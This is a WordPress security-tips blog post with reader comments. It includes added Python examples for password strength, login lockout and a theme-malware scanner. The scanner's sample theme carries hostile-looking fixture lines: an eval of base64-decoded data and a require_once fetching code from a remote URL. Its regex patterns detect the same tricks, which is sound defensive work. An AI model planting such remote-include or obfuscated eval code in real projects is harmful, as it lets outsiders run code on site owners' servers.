8 Tips to Secure a WordPress Site
Security is one of those topics that comes up time and time again. You hear the advice, you know you should do it, but somehow, you never get around to it.
The tips in this post are designed to help make your WordPress installation safer and less likely to be hacked or spammed. If you’re short on time, just start at the top and work down. I’ve (roughly) ordered them so that the most important tweaks come first.
We also have a great giveaway at the end of this post, from Sucuri.net and Appsumo. Check it out for the chance to win free site security monitoring for a year!
1 – Set up Backups
This is quite simply a requirement. If you don’t have backups, you’re putting all your eggs in one basket and if something goes wrong, you lose everything. You’d have to be mad to risk this…
There are 3 rules for a good backup:
- It can’t be saved on your server (Because then if your server dies, so do your backups).
- It needs to be automatic (Because you aren’t going to remember to do this yourself every day).
- You need to save a number of them (e.g. if you only save the past 5 backups, and then go on holiday for a week, your backups could all be useless by the time you get home).
Thankfully, they’re easy to do. Here are 3 possible ways:
- Automatic Database Backups to Email
- Automatic Amazon s3 Backups (For VPS users)
- VaultPress – Paid service from Automattic to make handling backups simple.
2 – Always Update WordPress
A fairly common thought used to be that “upgrading WordPress might break my plugins.” And it was true; upgrading WordPress does carry that risk.
Not upgrading is worse; it guarantees that you’re at risk. Almost every WordPress release that comes out has security fixes as part of it. If you don’t update, then by definition, you’re leaving those holes open.
At the very least, you can always do minor updates, e.g. 3.0.1 to 3.0.2. They’re usually solely for security and bugs, so always update right away when one comes out.
As an aside; it’s possible to hide the version of WordPress you’re using by adding this to your functions.php file:
```php
remove_action('wp_head', 'wp_generator');
```
That’s no substitute for upgrading though (And if they can load your login page, quite often the design is a dead giveaway anyway).
3 – Choose a Better Password
I know you hear this all the time, but crappy passwords are still the #1 reason for sites being hacked. How do you know if your password sucks?
Easy. Does it make any sense whatsoever as a word/phrase/name? If you can pronounce it at all, it’s probably bad. Your password should be a completely random, meaningless set of letters and numbers.
And the meaningless part is important there. Turning “michael” into “m1ch@el” doesn’t make it secure, it just means the hacker will get it on their second guess instead of their first.
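As an added illustration (not code from the post), this Python estimates how small the search space stays when a dictionary word is “leeted”, compared with a random alphanumeric string and with the multi-word passphrase suggested in the comments below. The substitution table and the dictionary size are assumptions chosen for the example.

```python
import math
from itertools import product

# Constructed substitution table: the swaps a word-based guesser tries after
# the plain word (an assumption for this example, not a list from the post).
LEET = {"a": "a@4", "e": "e3", "i": "i1!", "o": "o0", "s": "s$5", "l": "l1", "t": "t7"}


def leet_variants(word: str) -> int:
    """Number of distinct spellings a guesser must try once it knows the
    base word and applies the common substitutions in LEET."""
    count = 1
    for ch in word.lower():
        count *= len(set(LEET.get(ch, ch)))
    return count


def all_leet_spellings(word: str) -> list:
    """Enumerate those spellings; shows how short the list really is."""
    pools = [sorted(set(LEET.get(ch, ch))) for ch in word.lower()]
    return ["".join(p) for p in product(*pools)]


def guess_bits(search_space: int) -> float:
    """Work factor in bits: log2 of the number of candidates to try."""
    return math.log2(search_space)


def random_alnum_bits(length: int) -> float:
    """Random letters and digits: 62 choices per position."""
    return guess_bits(62 ** length)


def passphrase_bits(words: int, dictionary_size: int = 7776) -> float:
    """Words picked at random from a dictionary (7776 is an assumed size)."""
    return guess_bits(dictionary_size ** words)


if __name__ == "__main__":
    print("michael + leet:", leet_variants("michael"), "guesses,",
          round(guess_bits(leet_variants("michael")), 1), "bits")
    print("12 random alphanumerics:", round(random_alnum_bits(12), 1), "bits")
    print("4 random dictionary words:", round(passphrase_bits(4), 1), "bits")
```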
4 – Check Your Site Regularly
You’d be surprised how often your site can be compromised without you even knowing. For instance, a lot of unwanted scripts will hide links all over your pages that only search engines can see.
It’s crucial that you catch on fast because once Google penalizes you, getting your rankings back is a slow, painful process.
One way to check is to use tools like Google Webmaster Tools to see what links Google is finding on your pages.
Another option is to use a tool like Sucuri.net (Which we’re giving away at the end of this post!), which will automatically scan your site regularly and alert you to any issues.
5 – Prevent Directory Indexing
Directory indexing means that if someone loads a folder on your site (e.g. wp-content/plugins/), they will get a list of all the files in it. This is bad because then a hacker can see everything on your server.
The fix is easy, open up your .htaccess file in a text editor and add the following to it:
```apache
# Prevent directory indexing
Options -Indexes
```
6 – Don’t use FTP
FTP is the most common way to add files to your server, but it isn’t secure. Someone can intercept your transmissions and even your access details. If your host allows you to access your server with SSH, then you can use SFTP instead.
Behind the scenes the two work completely differently, but using them is exactly the same. Odds are you can even continue to use your current FTP program with SFTP instead.
There is no reason not to make this swap, so contact your host and ask them if you can use SFTP (Most should allow it).
7 – Move and Update Your WP-Config.php File
Your wp-config.php file doesn’t have to be in your site’s root folder (Where it is by default). You can move it up a folder (So it is no longer in your public web folders at all).
And it’s as easy as it sounds. Just move the file up one folder, and WordPress will know to find it there.
Also, if you’ve had WordPress for a while now, you may not have all the security keys that you should in your wp-config.php file. These keys help encrypt your passwords and other details. All you need to do is go to https://api.wordpress.org/secret-key/1.1/salt/, copy the code it generates, and then paste it into the relevant section of your wp-config.php file.
8 – Take Care Downloading Plugins/Themes
There are a lot of places to find these items, but not all of them are trustworthy. Many sites get caught out because they installed a script with malicious code hidden in it.
Before downloading a theme or plugin, Google the site to see what people say about it. Lots of good reviews and links? Then go for it. Hard to find any? Then best leave it alone.
For plugins; there is usually little reason for a free plugin not to be hosted on WordPress.org, so always go there first (There are still exceptions though, e.g. cforms). Or alternatively, you can buy premium plugins from sites you trust (Again though, check the site first!).
Themes are trickier. The WordPress.org theme directory is great, but a lot of talented theme developers do choose to host their themes on their own sites (The auto-update feature of the plugin directory isn’t so necessary with themes).
If you do take a theme from a 3rd party website, I’d recommend scanning it right away (Spammy paid links in the footer of a theme are a very common find that Google may penalize you for).
And of course, you always have the option of paying for premium themes (Though do be careful of sites selling themes they did not make. You have no guarantee that they haven’t tampered with the theme first).
Win a Year’s Free Security Scanning
Appsumo and Sucuri.net have kindly offered us 2 one-year licenses to their WordPress scanning tools to give away. Sucuri will automatically scan your website and notify you if you if it spots any issues. Better than that, they can help resolve them too.
To enter the competition, just tweet the following:
I’d like to win a year of Sucuri website monitoring & malware protection on @problogdesign via @appsumo http://bit.ly/j95q8Z
Update (18th May) – The competition is now over and the winners have been chosen (@ezyblogger and @wpmodder). We’ll have more again soon!
Until midnight tonight only, you can also buy Sucuri’s Business plan for only $85 for the year on Appsumo (Down from $289!). AppSumo gives you a guaranteed refund, no questions asked, so if you buy it and end up winning here, you can get your money back anyway!
Winner will be chosen and emailed this weekend, so good luck!
I think #2, #3 and #8 are the most important. Just doing these will make a wordpress blog mostly safe.
Plugins and themes are a huge hole in security, maybe the biggest. Many times script or theme owners put their own eval base64 garbage in them so they get credit. Often these actually pull raw php code from other websites, obfuscated in layers of encoded strings. Guess what, if that other website gets hacked, so does every blog that has those scripts in them. Additionally, the script owner can change the included code at will and can basically execute anything they want on your server! I don’t care how good it looks, if a theme has any obfuscated code in it, stay away!
The risk from someone intercepting an FTP request is pretty low. This would require them to have a packet sniffer somewhere on your local network, or on your server’s network. FTPS or SFTP would be best practices, but I think the real risk for FTP interception is very low.
Thanks for the comment, great to hear your thoughts :)
I agree entirely about the hidden code. If they’re using base64_decode for any reason at all, then just leave the theme alone.
I do think the SFTP tip is worth it though. You’re right that it may never happen, but then, who knows what may get onto your machine someday? Given how crucial those login details are, it just doesn’t seem worth it to me to take the chance. Especially when it only takes a few minutes to setup and from then onwards, it’s just like using FTP anyway.
Some great tips here, picked up one or two things that I didn’t even know you could do with WordPress!
Thanks,
Tony.
It’s good to use SFTP just to get into the habit of it. That way, if you are on wireless at the airport somewhere and decide to do some work, you don’t accidentally use regular FTP and let people sniff your password.
For the password, I’ve found a 3 to 4 word phrase works, and unless you’re the CIA, is good for most applications and immune to most dictionary attacks. For example: “I stopped 16 cars”. It has the benefit of being easier to remember than random nonsense.
I like your phrase idea. So long as it has some sort of random number in it, that seems like a good way to solve both problems (Complex but easy to remember), very nice.
Hi Michael
Wordpress security seems like a pain until….
Worth noting that Filezilla has a couple of secure methods of transfer.
Just check with your host that they are acceptable.
It was my host who told me about Filezilla secure settings.
For passwords there are some great generators out there.
You can set your password to 12 / 14 digits to include characters, capitals, the lot.
A good read Michael.
I know that you do a few videos Michael, so if you do get a few minutes take a look at a video I have on easyP.
An mini online video training course by Mr Video – Tom Breeze.
I’m sure you’ll find it useful for your own video work.
Keith
Thanks Keith! Yep, Filezilla is a great program. It definitely supports secure options like SFTP, and using them is identical to the regular FTP functions. It’s great! :)
Thanks for the heads up! I’ll definitely check it out! My video skills are very lacking so I’d love the good advice! On my desktop now, to be watched and commented on tomorrow! Looking forward to it, thank you! :)
One of my favorite plugins is called Login Lockdown. It registers the IP address and timestamp of failed logins and then block off those IPs after too many failed logins. It’s great, unless you forgot your password.
That sounds like a great plugin Chris, thanks for sharing. That would stop any sort of brute-force password guessing right away. I like the sound of it!
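The behaviour Chris describes (record the IP and timestamp of each failed login, block the IP after too many failures in a short time, which also locks out a legitimate user who forgot their password) as an added Python example, written for this post and not the Login Lockdown plugin’s own code. The thresholds, the log format and the sample log lines are all constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Policy values are assumptions for this example, not the plugin's defaults:
# lock an IP after MAX_FAILURES failed logins inside WINDOW, for LOCKOUT.
MAX_FAILURES = 3
WINDOW = timedelta(minutes=5)
LOCKOUT = timedelta(hours=1)


class LoginLockdown:
    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW, lockout=LOCKOUT):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.locked_until = {}              # ip -> datetime the lock expires

    def is_locked(self, ip, now):
        """True while the IP's lockout is still running; expired locks are cleared."""
        until = self.locked_until.get(ip)
        if until is None:
            return False
        if now >= until:
            del self.locked_until[ip]
            return False
        return True

    def record_failure(self, ip, now):
        """Register a failed login; return True if this one triggers a lock."""
        recent = self.failures[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:  # forget old failures
            recent.popleft()
        if len(recent) >= self.max_failures:
            self.locked_until[ip] = now + self.lockout
            recent.clear()
            return True
        return False

    def record_success(self, ip):
        """A successful login resets the failure count for that IP."""
        self.failures.pop(ip, None)


def parse_line(line):
    """Constructed log format: '<ISO timestamp> <ip> <LOGIN_OK|LOGIN_FAIL>'."""
    ts, ip, event = line.split()
    return datetime.fromisoformat(ts), ip, event


def replay(lines, tracker=None):
    """Run log lines through the tracker; return the locks triggered and the
    lines that were refused because the IP was already locked."""
    tracker = tracker or LoginLockdown()
    locks, refused = [], []
    for line in lines:
        now, ip, event = parse_line(line)
        if tracker.is_locked(ip, now):
            refused.append(line)          # even a correct password is refused
            continue
        if event == "LOGIN_FAIL":
            if tracker.record_failure(ip, now):
                locks.append((ip, now))
        else:
            tracker.record_success(ip)
    return locks, refused


# Constructed sample: 203.0.113.7 fails three times in seconds and is then
# refused even with the right password; 198.51.100.2 fails twice, half an
# hour apart, and is never locked.
SAMPLE_LOG = [
    "2011-05-14T10:00:00 203.0.113.7 LOGIN_FAIL",
    "2011-05-14T10:00:05 203.0.113.7 LOGIN_FAIL",
    "2011-05-14T10:00:09 203.0.113.7 LOGIN_FAIL",
    "2011-05-14T10:00:20 203.0.113.7 LOGIN_OK",
    "2011-05-14T10:01:00 198.51.100.2 LOGIN_FAIL",
    "2011-05-14T10:30:00 198.51.100.2 LOGIN_FAIL",
    "2011-05-14T11:30:00 203.0.113.7 LOGIN_OK",
]

if __name__ == "__main__":
    locks, refused = replay(SAMPLE_LOG)
    print("locks triggered:", locks)
    print("refused attempts:", refused)
```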
Michael,
Great post. I am doing some of those things, but there is more work to do. I wasn’t even aware of the sftp. I will try to get that from my host. Thanks for the tips.
Thanks Roberto. SFTP is a really great tool and simple to use once you first set it up. Definitely worth looking into, good luck!
One thing you can do is password protect the wp-admin folder, and if you use Disqus or IntenseDebate everything should work just fine.
That’s an interesting one Kevin. Another similar trick I’ve seen is people using .htaccess to limit access to the wp-admin folder to their own IP. It seems a good idea if your IP never changes, but not going to work for me :(
Yeah, my IP changes so no dice for me, lol.
Hi Michael
Thanks for coming over and leaving a great comment.
You are a star.
Hope you are doing well on your university course – not too much drinking. LOL
Haha, we’ll see… ;)
Great tips–and you’re right, a lot of this is common sense, but it seems like this kind of stuff gets knocked aside when people are “busy”. And that Login Lockdown plugin looks really interesting, I’ll have to look into it. Thanks!
I think you’re spot on there. It never seems a priority until you’ve actually been hacked, at which point it’s too late…
I am happy to find this post very useful for me, as it contains lot of information. Big thumb up for this blog post!
This is a great post! I was actually looking to write one of these posts for my blog. Security is one of the most important things you can do to protect your blog!
Good post. It’s also good to know that there are plugins that also increase the security of your WordPress site.
Hi Martin, this is best way to secure our wordpress blog, #1 is the first work we must do. Thanks for nice tips.
I love all these ideas. These are very useful to secure a WordPress site. It is a milestone for a newbie like me.
Important info. I make WordPress sites every week and usually never think much about security. I guess until some type of attack happens to you it seems like there’s little to worry about. It’s got me thinking though – I bet if a client’s site was attacked they would hold me responsible for that in some way, and most of my clients come from word of mouth. I’d be interested to know if anyone has had experience of a client’s website being hacked and how the client / you responded to it?
That’s a great question Kevin. I suppose I’ve been lucky in that none of my clients have ever been hacked (I’ve had clients tell me that they have been or that the site “broke”, but when I looked, the cause was always something they had done, so no issue there).
The question of responsibility is very interesting though. I don’t hold clients to any sort of “maintenance” contract after a project is done. I know that a lot of designers do expect to stay on some sort of monthly retainer though. If that was the case for you, then yes, I’d definitely think that a hacked site was your responsibility to prevent/repair.
As it is though, I only come back to work on a site again when the client gets in touch with me again. As part of that, I usually upgrade WordPress while I’m working, but if they aren’t updating it regularly and they get hacked, that’s not your fault.
The other thing I suppose is that you and I aren’t selling our services as security consultants. Obviously we want everything we make to be secure, but that’s different to guaranteeing a client won’t get hacked. To do that, you need to have control of everything, i.e. how their hosting is set up, what plugins you allow them to install, regular patching etc. which most clients can’t really give you. There’s just no way you can do that without regularly monitoring their whole server (i.e. them keeping you on a retainer)
I think that’s a long-winded way of saying that I do everything I reasonably can to make sure a client is kept safe (And none of my clients have ever been hacked, so that’s a decent track record), but that’s still not giving them a guarantee (And I’d be totally upfront about that with any client who wanted a guarantee).
This is a great post! Thanks for share
Nice article! I didn’t know about #5 and #7! I’ll add this to my blog asap! :D Thanks for sharing this wonderful article Michael!
Fantastic post – thanks for the tips, very useful.
I was just wondering if anyone here is using CloudFlare to help protect their site? I’ve been using their free service for a few days now and so far so good. The only concern I have is that updating pages in my WordPress sites is taking longer than normal. Has anyone else used CloudFlare?
I took a look at CloudFlare as a result of your post; I had never heard of them. What do you think of them so far? I was thinking about giving it a try.
I’ve been using CloudFlare for a couple of weeks and so far it seems pretty good. The website claims a 30% speed increase – I’m not sure about that, but it does seem a little quicker to load pages. So far many threats and dodgy bots have been blocked, which is a big +. You get a nice account with details of all threats blocked, which is nice. Just checked my account and 111 unique threats blocked in one week :o) There are a few negative reviews around but I haven’t noticed anything bad yet. The worst thing I did find is that cPanel stops working, but you can easily correct this. Check out my blog for more details: http://www.website-design-edinburgh.co.uk/blog/recommended/cloudflare-review/
Is there any way to check a theme before you actually install it to make sure there are no hidden links or malware in it? I haven’t seen a tool to do that around the net, and these steps prompted me to think of this a little closer as I do use or play with a lot of free themes.
Good tips though – some of them I follow and some I don’t, like the directory indexing, which is a sensible tip for all sites irrespective of WP or not.
Good list thanks….
Sorry, as far as I’m aware, there aren’t really any automated tools to do this.
Otto has a great post on his site about why this is: http://ottopress.com/2011/scanning-for-malicious-code-is-pointless/
Essentially, the best thing you can do is try out your themes on a test site first and check for any issues there.
Kieran and Michael,
Look at the “Theme-Check” plugin here:
http://wordpress.org/extend/plugins/theme-check/
…it checks for various things, but here’s the security part:
http://codex.wordpress.org/Theme_Review#Theme_Settings_and_Data_Security
That’s a great find Adam, thanks for sharing! It seems a good tool for developers, but more along the lines of making sure you use WordPress best practices. It won’t tell you if there is malicious code in a theme that you’ve downloaded (Though it’s definitely better than nothing, and extremely cool for devs, thanks!)
Yeah, agreed on the shortcomings, but like you said, better than nothing…for now…
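Added Python example, written for this discussion and not part of the post or the Theme-Check plugin: a small scanner that walks a theme’s PHP files and flags the obfuscation indicators mentioned above (eval of base64_decode or gzinflate output, base64_decode calls, code included or fetched from a remote URL, long base64 blobs). As Otto’s post notes, a hit list like this can only raise flags for manual review; a clean result does not prove the theme is safe. The indicator list and the sample theme files are constructed for the example.

```python
import re

# Constructed indicator list for this example (not Theme-Check's rules).
INDICATORS = [
    ("eval_of_decoded",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(", re.I)),
    ("remote_include",
     re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I)),
    ("remote_fetch",
     re.compile(r"\b(file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I)),
    # A quoted run of 120+ base64 characters is worth a look on its own.
    ("long_base64_blob", re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")),
]


def scan_source(name, source):
    """Return (file, line_no, indicator, snippet) for every hit in one file."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, lineno, label, line.strip()[:80]))
    return hits


def scan_theme(files):
    """files: mapping of path -> file contents, e.g. read out of a theme zip.
    Only PHP sources are scanned; CSS and templates without code are skipped."""
    hits = []
    for path, source in files.items():
        if path.endswith((".php", ".inc")):
            hits.extend(scan_source(path, source))
    return hits


def files_with_hits(hits):
    """Sorted list of the files a reviewer should open first."""
    return sorted({h[0] for h in hits})


# Constructed sample theme: footer.php carries an eval'd base64 blob (the
# blob just encodes the letters "ABC" repeatedly), functions.php pulls code
# from a remote URL, header.php is clean.
SAMPLE_THEME = {
    "header.php": "<?php wp_head(); ?>\n<body <?php body_class(); ?>>\n",
    "footer.php": "<?php\n$_x = '" + "QUJD" * 35 + "';\neval(base64_decode($_x));\n?>\n",
    "functions.php": "<?php\nrequire_once 'http://example.net/remote.txt';\nadd_theme_support('menus');\n",
}

if __name__ == "__main__":
    for hit in scan_theme(SAMPLE_THEME):
        print("%s:%d  %-16s %s" % hit)
    print("review first:", files_with_hits(scan_theme(SAMPLE_THEME)))
```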
Great post! I am going to try the login lock down plug it!
The one thing I wish I did not of is backing things up. That is a hard habit to get in to.
Michael,
Great post. I am doing some of those things, but I disagree with number 6 (about FTP). Thanks for the tips.
Any reason you disagree with it? I know it’s not terribly likely, but SFTP is the safer technology. Areas where you use a public wi-fi in particular could be somewhere to watch out for this.
Yeah, +1 for SFTP,
A client site got hacked recently because her FTP program was hacked. Use SFTP. Period.
This is a great article, and the thing about security is nobody ever wants to hear about it until it’s too late. There are so many things you can do to secure your WordPress website – it’s not funny. +1 on the Login Lockdown plugin, and we also use Secure WordPress to remove the WP footprint from the HTML code, and prevent some types of attacks. There’s another called “Bulletproof Security” in the repository that some are swearing by, as well as “WordPress Firewall 2”.
We have found that the .htaccess in the wp-admin folder is more hassle than it’s worth (causes problems), but having an .htaccess file in the wp-content/uploads folder (limiting file types) is surely worth it. If you want to know more, my free WordPress Security Guide is worth the read if you have the time.
If you want to see what you have to go through to fix an infected site, also try reading our 8,000 word How to fix a Hacked WordPress Blog post and see what a pain it is to recover from the devastation that hacks can do to your site in about 5 minutes.
Thanks again Michael for bringing this to people’s attention – security is a topic that never gets old.
Thanks for sharing those links JT, well worth a read for people! Good security advice isn’t always the easiest thing to find online!
Michael,
I’ve been relying on Login Lockdown and automated regular backups – so far with no issues at all. However your post has given me plenty of extra things to think of – In particular, directory listing, ftp use and moving the WP-Config.php. I appreciate this extra info. thanks
Regan
Ah, cool, I’m glad it was of use! Hope the changes went down well!
Thanks for the tips. Got to be I am quite new to wordpress. Found the tip about the themes most relevant as I spent yesterday downloading a number of themes. Better be more careful. Cheers
I have been more than satisfied with WordPress personally, but I have heard some real horror stories out there. I think I may want to make some changes for a preemptive strike.
Very nice tips, they help me a lot to secure my website. Thank you very much :)
Thank you for your great tips. It’s just help me to secure my wordpress blog.
I had some problems with the security of a WordPress blog. I hope that with these tips everything will go well.
So far I’ve not had any security problems with my WordPress sites, knock on wood. But I did only recently start backing them up and I think that is probably the most important of all the tips you listed. The password one to me is a no brainer. I’m amazed at how so many people use passwords that are really simple to guess. It’s like you’re inviting hackers in! Thanks for the post, good tips.
Hello
Nice post, good information.
As a web security consultant (and plugin developer), I do audits of WordPress plugins.
I don’t want to annoy you talking and talking about this, contact me if you need this service ;)
See you
Great article. Was looking for information like this; since it is an older article, are there any further updates to this?
Very useful tips. Get secure with your tips. Good bye hackers…..
Great stuff! Very useful specially for those people (like me) who have no the faintest idea about similar problems. thanks!
These are all great tips. I myself only just started setting up backups which I think is crucial. You don’t want to be stuck when a server goes down and all your work is lost.
Also, I think #3 is the second most important on the list. I know it’s harder to remember, but changing your password to something completely random will help massively.
Amazing, all tips are simply outstanding.
I am looking for more tips and info about WordPress.
Thanks for sharing great knowledge with us.
I agree with you Sara, backups are the most important tips.
My blog is on Blogspot…. How to do this in Blogspot…???
But thanks for sharing… I will create a WordPress blog, but not now..
I am just getting familiar with WordPress and this is terrific information. I will soon be publishing my first Blog and need all the information I can get. Thank you for this Blog.
Brilliant post. I am fairly new to WP, so it’s really good with useful information, thanks
Do you know “WordPress Backup to Dropbox”? That’s a plugin with which you can backup your wordpress to your Dropbox. I also make regular backups via FTP. (Which you say isn’t secure, I honestly never thought about that, so thanks for the advice :) )
Password plays a vital role in security. If we update WordPress, we can enjoy each and every tip of WordPress.
Very informative – WordPress is definitely getting better with its out-of-the-box security too. I like that your admin account doesn’t need to be ‘admin’ now and it gives you the option of changing it.
It would be neat if they did something like ExpressionEngine does, where you can specify where the system folder is, instead of it always being wp-admin, wp-content, and wp-includes.
Thanks for the tips.
Uhm! I don’t understand “Prevent Directory Indexing”?
Great post, these tips are very important to me, I will secure my blog with these great tips… thank you
Thanks my dear, your ideas and tips are really perfect. I will try to make use of these tips.
By the way, securing your site doesn’t depend on the script in general; the important security and the real security comes from the server. If it’s well configured and has special rules for general vulnerabilities, it will be more secure than script security.
anyways , Great topic !
Hello Michael,
Thanks for providing us these tips to secure our wordpress site. I’m not aware on most of these tips. I really found this post very helpful. Thanks again!
There are three ways someone could break into your WordPress site.
1. If you are running an old version of WordPress then they can use the known security holes in that version to break in. To avoid that you need to keep right up to date.
2. If you are running a poorly written plugin then they may be able to use that to break in. You need to be careful about what plugins you use and keep them to a minimum and also keep those you do use up to date.
3. If they can compromise your computer then they could gain access to it that way. You need to make sure your own computer is properly protected to prevent that happening.
you forgot:
4. if you’re using public wifi and somebody hijacks your connection they can steal your login info and break in that way
5. if you’re not using secure FTP somebody can sniff the packets on the Internet and get your login and break in that way
6. if your webhost doesn’t update and patch the operating system, web server, or cpanel software as often as they should, someone can break into your website using an exploit directly on your web hosting environment
7. if you install software in your web hosting account just to try it (like a forum, another CMS) and they forget about it and don’t update it – they can break into your website through the outdated software and THEN attack your wordpress install
believe it or not, there are even more ways beyond this that someone can compromise your website…
Securing a WordPress site is always an issue for the majority of users. Your approach of keeping a backup of all the pages is admirable.
You must have to set the values of AUTH, SECURE_AUTH, LOGGED_IN, and NONCE Keys and SALT in wp-config.php to some alphanumeric value. This will secure your Website and prevent it from being hacked.
In addition, you can also change the default username (admin name) of your WordPress Blog at the time of installation. If it is already installed then make use of Admin Name Extender WordPress Plugin to change the name. Reason: hackers know that 95% of wordpress users do not change default admin name at the time of installation.
thanks for the tips, very useful.
I’m awfully late to this party, but I did want to point out that just removing the wp version generator tag (as you mentioned in the article) is generally not enough to prevent someone from discovering what version of wordpress you’re using. Sucuri (which you’ve linked to in this post) has a great tool to show exactly how much information anyone who knows where to look can get. Securing your WP version is fairly difficult – so make sure you update!
After reading a lot of manuals and guide I decided to do something very simple. Signup for Vaultpress and sleep happily forever..
Great work to secure WordPress!
But I think now hackers have new tricks to hack WordPress.
A friend of mine has a blog that has been hacked and she was not able to recover it anymore. This is why I am looking for this kind of post that could certainly help me improve the security of my blog.
This is a great post and it has helped me a lot,
This is my first opportunity to visit this website. I found some interesting things and I will apply to the development of my blog. Thanks for sharing useful information.
is why I use Bullet Proof Security, a plugin written to prevent such attacks on your blog, even when everyone else is on a shared hosting
People should be more aware of their blogs and this why they should follow these tips strictly to make their wordpress site secure and useful.
A great article – we so often forget that the tiny mistakes WE make are enough for hackers to break into our site.
Hello Michael,
Great information. Securing WordPress is very important and often overlooked by many designers. The key is to make sure that no one can access your site that shouldn’t, so ALWAYS make sure you are running the latest version. Old versions have known security issues, and hackers know this. I agree with using SFTP for uploading but not all hosts provide SSH to the server. A solution to this is that once you use FTP or are done with the daily work, change the password in the control panel.
Thanks for this tutorial..will do this for my WordPress blog
Very good guide to secure my wordpress blog. Keep up the good work :)
Thanks for the tips Michael, I had no idea about the possibility of moving the wp-config file for security.
Thanks for the tips, preventing directory indexing is a great one, also, using SFTP seems like something one should be doing. Good news to find out about Sucuri’s services, they look promising.
I have submitted my site to several directories, especially for this new landing page (which is on page one for its keywords in 5 days of its being indexed). How do I check my files for this directory access? Secondly, I upload everything through FileZilla, which is FTP; if I go into my cPanel file manager, what do I look for to see if there are any worms or crawlers that are taking my data?
thank you for your advice, I was looking for some ways to make my art page more secure and found your blog, thanks a lot :-)
I think I am doing it all except the moving the WP config I will do that through my server right now.
This is one of the great blogs I’ve read today. Your site contains lots of good information and I’m sure many people will like it as I do. I would like to give this site a thumb up rating. Keep up the good works guys. I think I’m going to come back to this site regularly. Thanks.
It’s a nice post, I will bookmark it and share it on my Twitter account, thanks a lot
Nice, +1 for SFTP knowledge
A client site got hacked recently because his FTP program was reverse engineered. Use SFTP always. Stay safe
Your tips on WordPress security cover different aspects; it’s very comprehensive. Great! Thanks
Great Post !
Had some question on point 2.
What if the premium theme which I am using is not compatible with the latest version of wordpress…
Will all my posts be gone?
I have been contemplating about upgrading my wordpress for fear that all my stuff will be gone due to theme compatibility issue with wordpress….
No, You can easily upgrade your WordPress as well as Theme. All of your posts will be there.
You do not use the admin as the user name. Keep the password as strong as possible means include the capital, small as well as special characters in the password. You should regularly update your wordpress website. As Michael Martin the author of the post said keep the backup of your website regularly. Install the secure plug-ins in the website.